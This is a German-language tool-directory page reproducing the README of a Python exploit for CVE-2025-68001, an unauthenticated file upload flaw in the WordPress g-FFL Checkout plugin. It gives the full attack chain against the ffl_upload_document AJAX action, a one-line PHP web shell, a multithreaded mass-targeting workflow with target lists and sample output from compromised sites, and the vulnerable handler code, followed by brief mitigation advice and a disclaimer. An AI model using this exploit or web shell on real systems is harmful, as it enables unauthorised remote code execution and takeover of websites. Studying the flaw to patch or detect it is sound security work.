Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-68001 — Das WordPress g-FFL Checkout Plugin <= 2.1.0 ist anfällig für einen Arbitrary File Upload mit hoher Priorität. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-68001
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubnxploited/cve-2025-68001

CVE-2025-68001

Das WordPress g-FFL Checkout Plugin <= 2.1.0 ist anfällig für einen Arbitrary File Upload mit hoher Priorität.

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-68001

Das WordPress-Plugin g-FFL Checkout <= 2.1.0 ist anfällig für einen beliebigen Datei-Upload (Arbitrary File Upload) mit hoher Priorität

root@kitploit:~
  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 

Telegram CVE Python License


📡 Bleib der Zeit voraus. Tritt @KNxploited auf Telegram bei — deine exklusive Quelle für die neuesten CVEs, Zero-Days und modernste Exploit-Forschung. Ständig aktualisiert. Nicht für jeden.


📋 Übersicht

CVE-2025-68001 ist eine kritische Schwachstelle für nicht authentifizierten beliebigen Datei-Upload (Unauthenticated Arbitrary File Upload), die im g-FFL Checkout-WordPress-Plugin von garidium entdeckt wurde.

Die Schwachstelle ermöglicht es einem nicht authentifizierten Remote-Angreifer, über die AJAX-Aktion ffl_upload_document beliebige Dateien — einschließlich Web-Shells — auf den Zielserver hochzuladen, was zu vollständiger Remote Code Execution (RCE) führt.

FeldDetails
CVE-IDCVE-2025-68001
Pluging-FFL Checkout (g-ffl-checkout)
Betroffene Versionenn/a bis einschließlich <= 2.1.0
SchwachstellentypUnbeschränkter Datei-Upload
AuswirkungRemote Code Execution (RCE)
AuthentifizierungNicht erforderlich
CVSS-SchweregradKritisch
ForscherNxploited

⚙️ Funktionsweise

Der Exploit folgt einer präzisen mehrstufigen Angriffskette:

root@kitploit:~
1. GET /checkout
      ↓
   Extract `checkout_nonce` from inline JavaScript data

2. POST /wp-admin/admin-ajax.php
      action=ffl_upload_document
      nonce=<extracted_nonce>
      document_type=document
      document=<shell.php disguised as image/png>
      ↓
   Server stores the file without extension or MIME validation

3. Parse JSON response
      ↓
   Extract uploaded file path / unique filename

4. Access uploaded shell via HTTP
      ↓
   Remote Code Execution achieved ✔️

Das Plugin stellt einen AJAX-Endpunkt ffl_upload_document bereit, der:

  • Datei-Uploads ohne Authentifizierungsprüfung akzeptiert
  • Keine serverseitige Dateitypprüfung durchführt
  • Den gespeicherten Dateipfad in seiner JSON-Antwort zurückgibt

🔧 Voraussetzungen

Installiere alle Abhängigkeiten, bevor du das Skript ausführst:

root@kitploit:~
pip install requests rich
AbhängigkeitZweck
requestsHTTP-Anfragen & Sitzungsverwaltung
richTerminal-UI, Fortschrittsbalken, Panels
threadingMultithreaded Zielverarbeitung

Python 3.8+ ist erforderlich.


📂 Dateistruktur

root@kitploit:~
CVE-2025-68001/
├── CVE-2025-68001.py       # Main exploit script
├── shell.php               # Web shell to upload (you provide this)
├── list.txt                # Target URLs (one per line)
└── success_results.txt     # Auto-generated results output

🚀 Verwendung

Schritt 1 — Bereite deine Ziele vor

Erstelle eine Datei list.txt mit einer Ziel-URL pro Zeile:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

Das Skript fügt automatisch http:// hinzu, wenn kein Schema angegeben ist.


Schritt 2 — Bereite deine Shell vor

Lege deine PHP-Web-Shell in dasselbe Verzeichnis. Beispiel für eine minimale Shell:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Speichere sie als shell.php (oder unter einem beliebigen Namen — du wirst aufgefordert, ihn einzugeben).


Schritt 3 — Führe den Exploit aus

root@kitploit:~
python CVE-2025-68001.py

Du wirst interaktiv aufgefordert:

root@kitploit:~
Enter targets file name (default: list.txt):
> list.txt

Enter shell file name to upload (default: shell.php):
> shell.php

Enter number of threads (default: 50):
> 20

Schritt 4 — Ergebnisse überprüfen

Erfolgreiche Exploits werden automatisch in success_results.txt gespeichert:

root@kitploit:~
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php

Jede Zeile enthält:

  • Ziel-URL
  • Gespeicherter Dateipfad auf dem Server
  • Vom Server vergebener eindeutiger Dateiname
  • Ursprünglicher hochgeladener Dateiname

🖥️ Referenz der Skriptparameter

EingabeaufforderungStandardBeschreibung
Zieldateilist.txtDatei, die Ziel-URLs enthält
Shell-Dateishell.phpPHP-Shell, die auf das Ziel hochgeladen werden soll
Anzahl der Threads50Parallele Worker (max: 50)

📊 Beispielausgabe

root@kitploit:~
✔  https://victim.com  — /checkout reachable. Trying exploit...

┌─────────────────────────────────────────────────────┐
│                      Success                        │
│  https://victim.com                                 │
│  Original Name:  shell.php                          │
│  Unique Name:    a7f3c1d9e.php                      │
│  Stored Path:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

All targets processed ✔️. Results saved to: success_results.txt

🔍 Angreifbarer Codepfad (technisch)

Die Schwachstelle befindet sich im AJAX-Handler des Plugins, der ohne Berechtigungsprüfung registriert wird:

root@kitploit:~
// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // Nonce verified from /checkout page (publicly accessible)
    // No MIME type validation
    // No extension whitelist/blacklist
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}

🛡️ Gegenmaßnahmen & Behebung

Wenn du Website-Betreiber oder Entwickler bist, ergreife sofort die folgenden Maßnahmen:

  • ✅ Aktualisiere das Plugin g-ffl-checkout auf eine gepatchte Version (> 2.1.0), falls verfügbar
  • ✅ Deaktiviere das Plugin, bis ein Patch bestätigt ist
  • ✅ Beschränke die Ausführungsrechte in Upload-Verzeichnissen (z. B. .htaccess-Regeln)
  • ✅ Implementiere eine serverseitige Dateitypprüfung und eine strenge Whitelist für Dateierweiterungen
  • ✅ Überwache Upload-Verzeichnisse auf verdächtige .php-Dateien
  • ✅ Aktiviere WAF-Regeln, um nicht authentifizierte AJAX-Datei-Upload-Anfragen zu blockieren

⚠️ Haftungsausschluss

root@kitploit:~
DIESES TOOL WIRD AUSSCHLIESSLICH FÜR BILDUNGSZWECKE UND AUTORISIERTE
SICHERHEITSFORSCHUNG BEREITGESTELLT.

Mit der Nutzung dieses Skripts stimmst du ausdrücklich Folgendem zu:

  • Du besitzt die AUSDRÜCKLICHE schriftliche Genehmigung des Eigentümers des Zielsystems.
  • Du arbeitest in einer kontrollierten Laborumgebung oder in einem autorisierten Penetrationstest-Einsatz.
  • Du wirst dieses Tool NICHT gegen ein System einsetzen, das dir nicht gehört oder für das
    du keine rechtliche Genehmigung zum Testen hast.
  • Der Autor (Nxploited) übernimmt KEINERLEI Haftung für Schäden, Datenverluste,
    rechtliche Konsequenzen oder Missbrauch, die aus diesem Tool resultieren.

Die unbefugte Nutzung dieses Tools gegen Systeme ohne Erlaubnis ist ILLEGAL
und kann gegen Gesetze verstoßen, einschließlich, aber nicht beschränkt auf:
  — Computer Fraud and Abuse Act (CFAA)
  — EU-Richtlinie über Angriffe auf Informationssysteme
  — Sowie entsprechende Gesetze in deiner Rechtsordnung.

NUTZE ES VERANTWORTUNGSVOLL. HACKE ETHISCH.

👤 Autor

BenutzernameNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Folge @KNxploited auf Telegram, um die neuesten Schwachstellen-Offenlegungen, Exploit-Veröffentlichungen und Sicherheitsforschung zu erhalten — bevor es andere tun.


Mit Präzision erstellt von Nxploited · Nur für Bildungszwecke
Tool herunterladen